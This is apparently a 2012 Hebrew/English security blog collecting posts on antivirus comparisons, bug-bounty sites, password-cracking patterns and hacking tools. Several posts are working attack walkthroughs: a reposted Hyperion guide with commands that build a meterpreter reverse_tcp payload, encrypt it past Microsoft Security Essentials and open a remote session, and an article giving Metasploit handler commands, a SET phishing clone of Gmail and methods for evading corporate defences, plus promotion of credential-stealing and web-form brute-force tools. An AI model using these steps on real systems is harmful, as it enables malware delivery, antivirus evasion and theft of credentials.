השוואת מוצרי AV ע"י הארגון הבלתי תלוי av-comparatives.org

עתיקה בערך כמו ה talk back : " רק לינוקס" בהשוואה חלונות ,היא השאלה איזה AV עדיף לשים בבית , בחברה ,בענן וכו..
כנראה שהצורך לענות על שאלה זו הצדיק יצירת גורם בילתי תלוי המבצע בדיקות סדורות ומדרג את הפירמות בקטגוריות השונות.
תתפלאו , אבל הנתונים די מפתיעים!
המידע נגיש לכולם ( ניתן להוריד דוחות) .
לעיונכם
בחרתי להציג תוצאות מיבחן "עולם אמיתי" שנערך לאחרונה. התוצאות מיוחסות לחדשים אוגוסט - נובמבר 2012
לדעתי מדובר בגרסאות ביתיות אך יש גם דוחות לcorp's
FYI

סקירת מוצרי AV לMOBILE:

אתרים מותרים לסריקה ומציאת פגיעויות

כמו שדי ברור וידוע -להאקרי הכובע הלבן ( צריך למצא לזה ביטוי יותר ראוי בשפה העברית..) בכדי לסרוק או לבדוק אפשריות פריצה לאתרים , יש לקבל את רשות האתר אותו רוצים לבדוק . כמובן ש3ללא זאת הדבר יהיה עברה על החוק
למרבה הפלא - קיימים מספר אתרים המסכימים כי נחפור בקרביים שלהם למציאת פגיעויות וחלקם אף ישלמו לכם פר פגיעות..
על פי הבלוג של דן קמניסקי , איש אבטחה ידוע ומהולל , להלן שמות האתרים:

Paypal
Salesforce
Microsoft
Twitter
eBay
Adobe
Reddit
GitHub
Constant Contact
37 Signals
Zeggio
Simplify, LLC
Team Unify
Skoodat
Relaso
Modus CSR
CloudNetz
EMPTrust
Apriva

happy hunting!

HTTPS? או SMTP-טריק שהשתמש בו ראש ה CIA הפורש בעקבות הרומן

טריק שהשתמש בו ראש ה CIA הפורש בעקבות הרומן...

http://www.schneier.com/blog/archives/2012/11/webmail_as_dead.html

בגדול- למניעת ייורט תעבורת SMTP (מייל) ע"י ה FBI שלו ושל המאהבת – הוא פתח חשבון GMAIL ונתן לה גם את הססמה

שניהם התכתבו על אותו מייל שנישמר ב תקיית ה DRAFT ומעולם לא נישלח.

דבר נוסף – הוא עריכת מסמך בתוך DROPBOX על אותו חשבון מ2 משתמשים

כמובן שזה מקשה על היירוט ומצריך ניטור HTTPS במקום SMTP שפחות מאובטח .

בכל מקרה זה לא עזר להם מכיוון ש"כנראה" ה FBI מקבל ססמאות לחשבונות ושאר גישות לאינדוקס "פנים" תיבה בשירותים כמו GMAIL DROPBOX YAHOO וכו...

אז ת י ז ה ר ו ...-)

יומן שבועי 21-27- אוקטובר 2012

חשבתי ככה לרשום לעצמי ראשי פרקים עבור אירועי אבטחה ושאר דברים מעניינים שנתקלתי בהם השבוע שעבר - עוד לא סגור באיזה יום - אבל הרעיון הוא להתמיד...המממ קשה... טוב נתחיל בניסוי:

-2012 21-27

JAVA update - שוב חוזר הניגון ... למי שעוד לא עדכון -זה הזמן לשדרג ל 6.37 או ל 7.09 / אפשר להתחיל לזהות את גרסת ה JAVA המותקנת דרך אתר זה ולהתקדם באתר של JAVA לשדרוג - או לחלופין לשדרך אוטומאטית.דרך אגב ,לפגיעות האחרונה שהוגשה לריוויו ע"י חוקר אבטח מידע פולני - עדיין לא כתבו תיקון - לפי ORACLE יטופל ברבעון הראשון של 2013 , מומלץ למי שאין לו צורך בהרצת אפליקציות מבססות JAVA להסיר את תוסף הדפדפן עבור ג'אוה ,ובכל מקרה לעבוד עם כרום או FF ו .ל א עם IE

2. נסיון חדירה והתקפת CYBER על מחשבי המשטרה -עוד פרטים כאן , מקריאה ראשונית , נראה כי הנסיון מזכיר עשרות נסיונות שיכנוע ללחוץ על לינק או לפתוח קובץ דרך המייל ,בדרך כלל מיילים אלו קשורים לפשיעת סייבר - אך במקרה הספציפי הזה יתכן והיה מדוהר על מתקפת טרור קיברנטי ע"י אירן ( כך טוענים מומחי האבטחה שחקרו את העניין). קצת תמוהה בעיניי ,הצעד הקיצוני של ניתוק מחשבי המשטרה מהאינטרנט וממערכות נוספות מחשש לזליגת מידע ,ובנוסף חסימת DOK בכל החברה.

האם אין למשטרה מערכות ניטור לזליגת מידע שעובדת על רקע קבוע?
האם אין למשטרה יכולת לנתח פניות חשודות מתוך החברה לאינטרנט?
מדוע לא חסום DOK כברירת מחדל?
מעבר לאנטי וירוס המותקן במערכת הדואר - מדוע לא חוסמים במשטרה כ ל קובץ מסוכן כגון EXE ו DLL??? כל סוג כזה מומלץ שישלך לתיבה מיוחדש המאושרת רק ע"י אנשים אבטחת מידע.
בקיצור ניראה כי פאניקה והחלטות קשות , היו כאן למחוויר.

Radware lunches new DDOS security site

www.DDoSWarriors.com
Provides comprehensive analysis on DoS and DDoS attack tools, trends, and threats

יש כאן חומרים מעניינים מאד ומקיפים בנושא התקפות מניעת שירות ,כלים,חדשות וכו,

יצא לי להיפגש ואף לשמוע הרצאה מהמומחים של רדוור ובפירוש יש שם כמות ידע עצומה ויחודית.

מומלץ!

Anti Virus evasion Technic -Hyperion tool

שימוש בשיטה מיוחדת העושה שימוש בהצפנה בכדי למנוע זיהוי קובץ זדוני ע"י אנטיוירוסים

להלן ההוראות לשימוש על bt5r3 לקימפול קוד ה hyperion ולשימוש על EXE שנבחר:

בדקתי וזה עובד!

taken from

http://e-spohn.com/blog/2012/08/02/pe-crypters-hyperion/

****

I recently watched a presentation that rel1k gave at bSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated Binary Droppers,Shellcodeexec, Powershell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE Packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted and encapsulated with a weak 128-bit AES key, which is simply brute forced at the time of execution. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools need to cross-compile executables.

root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe

Now that we have our Hyperion crypter executable. Let’s create a Metasploit payload.

root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe




root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe

Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.



As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.
root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe

And if we copy our encrypted payload to our Windows host…



Ah, nothing to see here :-) Let’s see if it works.
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)

Oh, you know that’s right!

You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for detection. So, your best option for testing custom payloads is to simply install the version of anti-virus that you are trying to bypass.

Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors could easily create a signature for these payloads. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in later post. Happy Crypting!


This entry was posted on August 2, 2012, 5:43 pm and is filed under AV Bypass, Security. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.



Comments are closed.

הרצאה מומלצת של יפתח עמית -sexy defense

From derbycon 2012 - A lecture from iftach amit about playing good defense

watch it

Cyber Security Events Time Line

A very nice timeline of events which includes : cyber crime ,cyber warfare and other importent security events .

check it out here

Cool SciFi Name Generator

Need a nick name? a fake identity ?

consider try this site:

http://donjon.bin.sh/scifi/name/#trandoshan

Windows Credentials Editor recomanded -post exploitation password dumping \pass the hash \kerberos and more tool

כלי לחשיפת ססמאות וכן ל PASS THE HASH העובד גם על WIN7 ו SERVER 2008

היחוד שלו הוא שהקריאה מתבצעת ישירות מהזיכרון ולא דרך קבצים ( SAM REG וכו)

לא לשכוח לנסות wcf -w

taken from their site:

What is WCE?

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:

Perform Pass-the-Hash on Windows
'Steal' NTLM credentials from memory (with and without code injection)
'Steal' Kerberos Tickets from Windows machines
Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
Dump cleartext passwords stored by Windows authentication packages

WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.

What is the current version?

The current version of WCE 32bit is v1.3beta; you can download it here and the current version of WCE 64bit is v1.3beta; you can download it here.

best Google search-FU ever new tool

הרצאות DEFCON 2012 מתחילות לזרום אט אט לtube , אחת מהם כבר כאן ומציגה כלי בגרסה חדשה לGOOGLE DORKING - הטוב ביותר שראיתי עד היום.

הכלי מכיל עשרות פיצ'רים ולכן ממליץ ב ח ו ם לראות את ההרצאה של החברה האלו כ א ן

ניתן להוריד מ כ א ן

יש לנו פיצוח!! ----more on passwords cracking

השנה האחרונה היתה עמוסה כרימון בדליפת מסדי נתונים המכילים ססמאות .

אתרי ענק כגון לינקדאין ורוק יו הותקפו בדרך כלל דרך הזרקת SQL וחשפו מיליוני סיסמאות משתמשים , חלקם מוצפנים (HASH) ו\חלקם לא .
חשיפה גדולה כזו של סיסמאות " עולם אמיתי" ,מעבר לשיקוף של מצב אבטחתי עגום של חברות גדולות במשק- מאפשר מחקר סטאטיסטי וניתוח תבניות של בחירת סיסמאות ע"י המשתמשים ( ותתפלאו לדעת כמה אנחנו לא מקוריים בעליל..).

מחקר כזה נערך ע"י חברת kore logic security . החברה מנהלת תחרויות לפיצוח ססמאות ומפרסמת את שיטות הפיצוח הכוללות: הבנות סטאטיסטיות,רשימות מילים נפוצות , תבניות ( RULES) עבור john the ripper וכן את דירוג כלי הפריצה המומלצים לפי תוצאות התחרויות.

אנקדוטה קטנה שרציתי להתעקב עליה מדברת על כלי שלא היה ידוע לי בשם HASH CAT הכולל גם גרסת GUI .
היחודיות של כלי זה מעבר לנוחות שלו הוא השימוש ב GPU ( כרטיסים גראפים) לביצוע פעולות הפיצוח - תומך עד שירשור של 120 כרטיסים !!! - הכלי הזה הוא גם בדרך כלל המנצח הגדול בתחריות פיצוח ססמאות הנערכות ב DEFCON ע"י kore logic security .

ממליץ לקרא את המחקר ולהוריד את רשימת המילים.

אז מה ההאקרים למדו והפכו לתבניות פריצה לססיסמא :

חוקים קימים במנוע החוקים של john the ripper:

הוספת מספרים בסוף הססמה
אות גדולה בתחילת כל מילה
הוספת ! לסיום מילה עם תחיליות אות גדולה
הוספת 123 בתחילה או בסוף הססמה.
וריאציות על שם המשתמש ( הוספת סימנים מיוחדים,מספרים וכו)

חוקים מורחבים שהוספו ע"י kore logic:

4 אותיות+4מספרים או 5 אותיות +3 מספרים או 3 אותיות +5 מספרים. Nove2010 Fall2010
הוספת 1234 בססמא בתחילתה או בסופה. - 1234pass !QAZ1234
שימוש בשנה הנוכחית כמספר בתוך הססמה -!Jan2012 2012!! Work2012aha
שימוש בשנה נוכחית או קודמת כמספר + סימן מיוחד 2010ly!! 2001MARK2010!! 2010#dec
חודשים וימים בתחילת באמצע או בסוף הססמא--January!2006 March#16 OctO2008$ Octo2**9 Octob!!05 Friday.56 Thursday99=
הוספת סימנים מיוחדים בסוף הססמה או בהתחלת !1q1q1q1q !! -FRANCE# BonJovi@
תוספת סימנים מיוחדים בצורה " מיוחדת" Africa!1 AmyOct!1 Kar!dani1 T@Y!OR1 b@byg!r1 Amanda!1 A!lison1 We!come1 S!LVER1 Amelia7!1
תבניות אצבעות - משתמשים אוהבים מאד להשתמש בססמאות לפי סידור המקשים במקלדת דוגמא:

!1234qwe !@#$QWE ASDFqwer !QWERTY NHY^5tgb

מילים הקשורות לסביבות פיתוח פרוד או בדיקות-Prod!111 prod@123 TEST-CO test!ng

רשימות מילים להם הצלחה טובה ( ניתן להוריד מהאתר שלהם):

Seasons - Months - Years - First Names - Last Names - Cities - States -
Regions - Countries - "RockYou" List - Regions of India/China/USA -
Religious references (books of the Bible, lists of Gods, etc) - keyboard
combinations - 4 letter words - 5 letter words - 6 letter words - 7 letter
words - Sports Teams - Colleges - Client specific words - Dates -
Numbers - Common wordlists – Facebook Names List (‘fbnames’)

מסקנה אחת גורפת:

סיבוך ססמאות ( password complexity ) לא גורמות למשתמש לבחור ססמאות "טובות יותר" אלא מכריכות את המשתמש להשתמש בטריקים או תבניות . תבניות אלו קל לצפות ולפצח בזמן קצר.

סיסמאות גישה באינטרנט עוד פחות מבאובטחות וקלות לפריצה מזו של פנים תאגידים

יש לעבור ל 2 factor authentication ככל הניתן (google,yahoo etc)

תאגידים- ללמוד את התבניות הנפוצות בארגון ולהגביל באמצעים טכניים ( כן כן - נסו לפצח ססמאות של העובדים שלכם -))

מארק רוסינוביץ על מגמות באבטח מידע

מארק רוסינוביץ למי שלא יודע,הוא האדה שכתבתה את SYSINTERNALS TOOLS החינמיים המוכרים לכל אדמין ואיש מחשבים באשר הוא.
האגדה אומרת שהוא מבין במערכות מיקרוסופט יותר מהמפתחים של מערכות אילו עצמם -),
בסופו של דבר מיקרוסופט קנתה אותו לשורותיה אבל יאמר לזכותם כי השאירו את הכלים שהוא פיתח -חינמיים.
באחד הפודקאסטים שבו הוא התארח לאחרונה ומדבר על הספרים שהוא כותב
הוא מדבר על עתיד אבטחת המידע בעדן השלישי של עולם המחשבים - עידן הענן והמובייל.
העידן הראשון היה MAIN FRAME ,העידן השני הוא עידן ה CLIENT_SERVER

הנה הטרנסקריפט של השיחה ( בהזדמנות אני אתרגם)
מעניין מאוד:

MARK: Well, the bigger trends, I think we're right in the middle of the third disruption in the computer industry, the first one being the mainframes, the second one being client-server, and this one being cloud and mobile. So that's one that's affecting everybody and the way that everybody thinks about software, from enterprise developers to ISDs to consumers. But underneath that, as far as security goes, I think that what we're seeing - and I've been a proponent of this form of security, the security technique, the security mechanism since shortly after 2000, when I started to really focus on what my software company, Winternals at the time, could do from a security perspective, and that is whitelisting. Back then whitelisting was something that nobody used. Windows and UNIX had some whitelisting capabilities, but very, very few people used it. And that's been the case up until very recently.

And people I don't think are really aware of this, but now whitelisting has become one of the key security features of the modern client platforms. When you look at iOS, for example, Apple's ecosystem, it's a complete whitelisted ecosystem. The whitelist, you can only run the software on the phones that have been approved by Apple and curated by Apple. Apple is essentially creating their whitelist in their Apple store. And that has made those platforms - Android's got one. It's not as well curated, so we've seen a problem with that. And then Windows Phone's got a curated whitelist, as well, and Windows 8 does, too, that those whitelists, you see the dramatic impact on the security of the system by having that whitelisting in place. Even if there is - and the sandboxing that goes with the whitelisting, as well. So I think I feel somewhat vindicated because I've always believed whitelisting would come back and become one of the primary tools in a cybersecurity posture or platform. And we're seeing that with the cloud platforms really adopting it and seeing the dramatic effects of that being in place.

Client Side Attacks

taken from :

http://securityhorror.blogspot.co.il

Industrializing Client Side Attacks

Introduction

Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability.

The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet.

Today's Hacking Scene

Today’s complex hacking operation now utilizes teamwork, global coordination, and sophisticated criminal techniques designed to elude detection. In recent years, a clear definition of roles and responsibilities has developed within the hacking community forming a supply chain that resembles that of a drug cartel. Additionally, the machine of choice is the botnet – armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets.

Improvements in automated and formalized attack tools and services have introduced a new set of security problems for businesses. Of the top 10 data breaches in 2009, half involved stolen laptops, while the other half involved Web and database assaults.

Client side attacks are on the rise

Client-side vulnerabilities are among the biggest threats facing users, nowadays's there has been a slight shift to the client side because server-side applications have been targets for attackers since 2001, and these applications have matured somewhat. Attackers are also going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients. The remedy is to maintain the most current application patch levels, keep antivirus software updated and seek and remove unauthorized applications.

Understanding client side attacks

In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time.

Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn’t process any potentially harmful data sent from the server.

A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pairs, for example e-mail, FTP, instant messenging, multimedia streaming, etc.

Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect limited set of client technologies.

Drop-ing the payload

There are various way an a attacker can drop her payload to the targeted workstation or laptop, some of them are listed below:

Through clicking evil links hiding malicious payloads hold on a malicious server controlled by the attacker.

Through vulnerable web servers by either compromising them or exploiting vulnerabilities on them.

Through Man In The Middle attacks.

Through phishing e-mails also holding malicious payloads.

Through various other attacks that are out of the scope of this article.The following image shows one of the most popular ways to "seduce" a user into clicking on a malicious web site:

Note: This is an old fashioned attack approach, very well replicated by the penetration testing community during hacking attack. Of course social engineering is also used through out that process.

The actual attack simplified

All you need to perform this type of attack is the Social Engineering Toolkit (SET) and Metasploit, well not exactly, that is not true if you are targeting high profile targets. But first lets explain the simplified version of the attack. In order the perform client side attack to a user that is NOT protected by some serious hardening such as a reverse SSL proxy with content inspection features and a firewall with proper egress filtering then the tools mentioned above will do the job. By using the tools described above the following steps have to be taken:

Set up a listener bind to a public IP or DNS name.

Demonize the listener.

Research the victims laptop software and hardware.

Social engineer the user to download and execute it to her laptop.

Use proper payloads for post exploiting the victim.Note: Again this is a simplified attack sequence and is not going to work in a laptop or workstation that is hardened and the user is not allowed to install software.

Setting up the listener

So after we successfully generate the desired payload, which by the way I named it ClickMe.exe, and verify that it is a valid executable file by issuing the file command we move forward on how to launch the handler on the attackers machine, so in order to do that we type the following commands in the order given below:

cd /pentest/exploits/framework3

./msfconsole

msf > use exploit/multi/handler

msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler)> set LHOST publicIP

msf exploit(handler)> set LPORT 123

msf exploit(handler)> exploit -jNote: The attackers machine should be accessible some how from victims machine (e.g. by using a publicly static IP or DynDNS).

Generating the payload and setting up the clone

SET is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET has a feature called “set-automate” which will take an answer file as an input and enter the commands in the menu mode for you. So for example if I wanted to do the Java Applet I would create a file with the following text:

https://gmail.com no

Now lets name the file mySET.txt, the command that will execute a java applet attack would be:

root@bt:/pentest/exploits/set# ./set-automate mySET.txt

Note: The described configuration will launch multiple web-based attack from SET using the Java Applet attack method by embedding a malicious Java Applet to a gmail clone. SET will also launch the listener but it would better if you do it manually.

After a successful compromise

If the victim is properly social engineered and execute the payload then the meterpreter agent will launch back a remote shell connection. The Meterpreter (short for Meta Interpreter) payload will give an attacker a presence in memory only payload, and reduce the attackers need to touch disk to zero. Metasploit will upload a DLL (Meterpreter) to the remote host; the uploaded DLL will be stored in the compromised processes heap. Meterpreter once loaded offers the attacker a plethora of options.

Once Meterpreter’s staged shellcode has been executed and Meterpreter has been loaded, communication begins. Meterpreter’s communication and extensibility are what makes it so valuable to an advanced attacker. For the purposes of this article think about the attacker as the client, and the victim as the server.Meterpreter uses a protocol called Type Length Value (TLV).

Why the above methods wont work on a corporate environment

When referring to a hardened corporate environment a set of prevention technologies is used to protect the user workstations such as anti-virus software, endpoint security software with personal firewall, e-mail gateways/anti-spam middle systems devices, web gateways performing deep content inspection to non-encrypted connections, reverse SSL proxies filtering all SSL connections that validate payload certificates and finally IDS/IPS devices are also included.

Many advanced payloads do not work very well running in x86-64 (Windows).

Very restrictive inbound and outbound firewall rules.

Authentication is required for outgoing connections.

Bypassing defenses

There are numerous techniques in defeating the all defenses mentioned above some of them are:

Code signing certificate for the payload (e.g. for the Meterpreter executable or the Meterpreter malicious Java Applet).

A SSL certificate from a trustworthy Certificate Authority, for the payload communication protocol.

Use costume communication protocol instead of the one used by the Meterpreter since you don't want to be detected and blocked because you’re mimicking the behavior of a well-known hacking tool.The Metasploit meterpreter reverse_http(s) payload contains the string "Meterpreter" on the User-Agent variable.

Create a custom payload or add your own evasion techniques, this way almost any signature detection system can be bypassed.

Avoid process dll injection while delivering the payload. The latest versions of windows enforce session separation so some of the methods may not work on the latest version of windows like windows 7/8.Why code signing is not secure

Code signing can provide several valuable features. The most common use of code signing is to provide security when deploying; in some programming languages, it can also be used to help prevent namespace conflicts. Almost every code signing implementation will provide some sort of digital signature mechanism to verify the identity of the author or build system, and a checksum to verify that the object has not been modified. It can also be used to provide versioning information about an object or to store other meta data about an object.

Many code signing implementations will provide a way to sign the code using a system involving a pair of keys, one public and one private, similar to the process employed by SSL or SSH. For example, in the case of .NET, the developer uses a private key to sign their libraries or executables each time they build. This key will be unique to a developer or group or sometimes per application or object. The developer can either generate this key on their own or obtain one from a trusted certificate authority (CA).Of course it is not so difficult to sign a malicious code, unauthorized digital certificates have been found that chain up to a Microsoft sub-certification authority issued under the Microsoft Root Authority that can be used to sign malicious code.

More specifically components of the Flame malware were found to be signed with a certificate that chained up to the Microsoft Enforced Licensing Intermediate PCA certificate authority, and ultimately, to the Microsoft Root Authority. This code-signing certificate came by way of the Terminal Server Licensing Service that operate to issue certificates to customers for ancillary PKI-based functions in their enterprise. Such a certificate could (without this update being applied) also allow attackers to sign code that validates as having been produced by Microsoft.

Why valid certificates are not secure

Obtaining a valid certificate and using it with SET is easy. The fact that this is easy can be verified by numerous web site reporting compromised certificates, one of them is this one:

http://www.ccssforum.org/malware-certificates.phpThis is an extract from the web site with a long list of compromised certificates: "The following is a list of digital certificates that have been reported by the forum as possibly being associated with malware to various certificate authorities. This information is intended to help prevent companies from using digital certificates to add legitimacy to malware and encourage prompt revocation of such certificates."

Obfuscating Meterpreter

It is really easy to obfuscate Meterpreter, in the following post http://spareclockcycles.org/tag/meterpreter/ the person that owns the blog explains that he/she managed to obfuscate the Meterpreter by writing a XOR program in python. The following extract is from the blog:

"What surprised me during all of this was how ridiculously easy it is to do just that. About 60 lines of Python (I know, way too many) and 20 lines of C was all it took to take my detection rate from 40% to 1% (32 bit version / 64 bit version). The Python code largely is just to automate things, but it also made the XOR crypting easier and allowed me to more easily embed arbitrary executables in my code (which is useful in embedding other, non-metasploit payloads)."

Epilogue

The drop-ing payload is a very important part of a social engineering attack. If you are doing all the other stages like a professional but use an average payload you won't get the great results you expect. Client-side attacks and social engineering should be included in every penetration testing engagement, if you are not testing for social engineering attacks a very significant attack vector that real hackers use will be skipped.

References:

http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/

http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja

http://www.honeynet.org/

http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html

http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html

http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29

http://securityxploded.com/dll-injection-and-hooking.php

http://en.wikipedia.org/wiki/Code_signing

http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx

http://spareclockcycles.org/tag/meterpreter/

News from BackTrack and Wireshark

The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task.Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

Get Wireshark

The current stable release of Wireshark is 1.8.2. It supersedes all previous releases, including all releases of Ethereal. You can also download the latest development release (1.8.0rc2) and documentation.

Stable Release (1.8.2)

	Windows Installer (64-bit)
	Windows Installer (32-bit)
	Windows U3 (32-bit)
	Windows PortableApps (32-bit)
	OS X 10.6 and later Intel 64-bit .dmg
	OS X 10.5 and later Intel 32-bit .dmg
	OS X 10.5 and later PPC 32-bit .dmg
	Source Code

FireForce - a firefox form- brut force attacking tool

nice tool for hacking admin access web portals and other web forms .
Guss passwords either with a dictionary or Brut force attack .

you can use the passwords lists from my previous post
or from here

Get the addon here

